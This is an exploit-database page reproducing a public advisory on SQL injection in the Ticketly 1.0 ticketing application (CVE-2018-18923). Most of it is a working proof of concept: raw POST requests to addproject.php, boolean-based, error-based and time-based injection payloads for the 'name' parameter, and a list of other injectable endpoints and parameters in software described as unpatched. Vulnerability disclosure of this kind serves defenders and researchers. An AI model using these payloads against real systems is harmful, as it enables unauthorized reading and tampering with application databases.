Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormJavier OlmedoPACKETSTORM:150422
HistoryNov 21, 2018 - 12:00 a.m.

Ticketly 1.0 SQL Injection

2018-11-2100:00:00
Javier Olmedo
packetstormsecurity.com
225

0.599 Medium

EPSS

Percentile

97.8%

JSON
`# Exploit Title: Ticketly 1.0 a 'name' SQL Injection  
# Exploit Author: Javier Olmedo  
# Website: https://hackpuntes.com  
# Date: 2018-11-19  
# Google Dork: N/A  
# Vendor: Abisoft (https://abisoftgt.net)  
# Software Link: https://abisoftgt.net/software/6/sistema-de-tickets-y-soporte-con-php-y-mysql  
# Affected Version: 1.0  
# Patched Version: unpatched  
# Category: Web Application  
# Platform: Windows & Ubuntu  
# Tested on: Win10x64 & Kali Linux  
# 6. References:  
# https://hackpuntes.com/cve-2018-18923-ticketly-1-0-multiples-sql-injections/  
# CVE: N/A  
  
# 1. Technical Description:  
# Ticketly 1.0 are affected by SQL Injection in multiple parameters and  
# resources through POST. This allows a attacker to read and modify  
# sensitive information from the database used by the application.  
  
# 2. Proof Of Concept (PoC):  
# 2.1 The following POST request generates an error 500 in the Application (add ' in name parameter)  
---  
POST /ticketly/action/addproject.php HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0  
Accept: */*  
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3  
Accept-Encoding: gzip, deflate  
Referer: http://localhost/ticketly/projects.php  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
X-Requested-With: XMLHttpRequest  
Content-Length: 32  
Connection: close  
  
name=Test%22&description=Test  
---  
  
# 2.2 In another request, add two ' to receive a code 200 OK  
---  
POST /ticketly/action/addproject.php HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0  
Accept: */*  
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3  
Accept-Encoding: gzip, deflate  
Referer: http://localhost/ticketly/projects.php  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
X-Requested-With: XMLHttpRequest  
Content-Length: 32  
Connection: close  
  
name=Test%22%22&description=Test  
---  
  
# 3. Payloads  
# 3.1 Payload (boolean-based blind)  
name=Test" RLIKE (SELECT (CASE WHEN (4632=4632) THEN 0x54657374 ELSE 0x28 END)) AND "lrmZ"="lrmZ&description=Test  
  
# 3.2 Payload (error-based)  
name=Testa AND EXTRACTVALUE(9139,CONCAT(0x5c,0x7176766a71,(SELECT (ELT(9139=9139,1))),0x7178717a71)) AND "SZJL"="SZJL&description=Test  
  
#3.3 Payload (AND/OR time-based blind)  
name=Testa RLIKE SLEEP(5) AND "WkTS"="WkTS&description=Test  
  
# 4. Vulnerables resources and parameters  
# /action/addproject.php (description, name, category_id and description)  
# /action/addticket.php (king_id, priority_id, project_id, status_id and title)  
# /reports.php (kind_id y status_id)  
  
  
`

Related

exploitdb 2
exploitpack 2
prion 1
cve 1
cvelist 1
nvd 1
exploitdb
exploitdb
Ticketly 1.0 - 'name' SQL Injection
2018-11-21 00:00:00
Ticketly 1.0 - 'kind_id' SQL Injection
2018-11-26 00:00:00
exploitpack
exploitpack
Ticketly 1.0 - kind_id SQL Injection
2018-11-26 00:00:00
Ticketly 1.0 - name SQL Injection
2018-11-21 00:00:00
prion
prion
Sql injection
2018-12-13 19:29:00
cve
cve
CVE-2018-18923
2018-12-13 19:29:00
cvelist
cvelist
CVE-2018-18923
2018-12-13 19:00:00
nvd
nvd
CVE-2018-18923
2018-12-13 19:29:00

0.599 Medium

EPSS

Percentile

97.8%

JSON
Related for PACKETSTORM:150422
exploitdb2exploitpack2prion1cve1cvelist1nvd1